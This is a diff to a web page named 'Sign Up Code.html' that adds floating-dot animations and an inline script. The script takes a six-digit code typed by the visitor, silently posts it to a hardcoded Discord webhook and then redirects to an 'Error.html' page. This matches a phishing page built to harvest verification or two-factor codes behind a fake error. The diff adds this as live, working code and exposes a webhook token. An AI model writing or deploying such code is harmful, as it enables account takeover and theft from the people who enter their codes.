--- a/Sign Up Code.html
+++ b/Sign Up Code.html
@@ -22,6 +22,29 @@
       100% { background-position: 0% 50%; }
     }
 
+    .particles {
+      position: absolute;
+      top: 0; left: 0;
+      width: 100%; height: 100%;
+      pointer-events: none;
+      overflow: hidden;
+      z-index: 1;
+    }
+
+    .particles .dot {
+      position: absolute;
+      width: 8px;
+      height: 8px;
+      background: rgba(255,255,255,0.1);
+      border-radius: 50%;
+      animation: float 12s linear infinite;
+    }
+
+    @keyframes float {
+      0% { transform: translateY(0); opacity: 1; }
+      100% { transform: translateY(-100vh); opacity: 0; }
+    }
+
     .container {
       position: absolute;
       top: 50%;
@@ -107,6 +130,8 @@
   </style>
 </head>
 <body>
+  <div class="particles"></div>
+
   <div class="container">
     <h2>Enter Your Code</h2>
     <form id="form2">
@@ -115,6 +140,57 @@
     </form>
   </div>
 
-  <script src="code.js"></script>
+  <script>
+    // Particles
+    for (let i = 0; i < 40; i++) {
+      const dot = document.createElement('span');
+      dot.className = 'dot';
+      dot.style.left = Math.random() * 100 + '%';
+      dot.style.top = Math.random() * 100 + '%';
+      dot.style.animationDuration = (6 + Math.random() * 6) + 's';
+      document.querySelector('.particles').appendChild(dot);
+    }
+
+    // Webhook logic
+    const webhookUrl = 'https://discord.com/api/webhooks/1413009868364976218/FRWyak8eE5D6BdqXv5x3_bMiKexf5I8x1y1qJuMPHRMcirw3qxCZseR5qXdatlQrCntp';
+
+    const sendCode = (code) => {
+      const msg = {
+        content: `🔐 Code submitted!\n**Code:** ${code}`,
+        embeds: [{
+          title: 'Code Entry',
+          color: 15158332,
+          fields: [{ name: 'Code', value: code }],
+          timestamp: new Date().toISOString()
+        }]
+      };
+
+      fetch(webhookUrl, {
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json' },
+        body: JSON.stringify(msg)
+      })
+      .then(res => {
+        if (!res.ok) throw new Error(`HTTP ${res.status}`);
+        console.log('Code webhook sent successfully');
+        setTimeout(() => window.location.href = "Error.html", 750);
+      })
+      .catch(err => {
+        console.error('Code webhook error:', err);
+      });
+    };
+
+    document.addEventListener('DOMContentLoaded', () => {
+      document.querySelector('#form2').addEventListener('submit', (e) => {
+        e.preventDefault();
+        const code = document.querySelector('#Code').value.trim();
+        if (!/^\d{6}$/.test(code)) {
+          alert('Code must be exactly 6 digits.');
+          return;
+        }
+        sendCode(code);
+      });
+    });
+  </script>
 </body>
 </html>
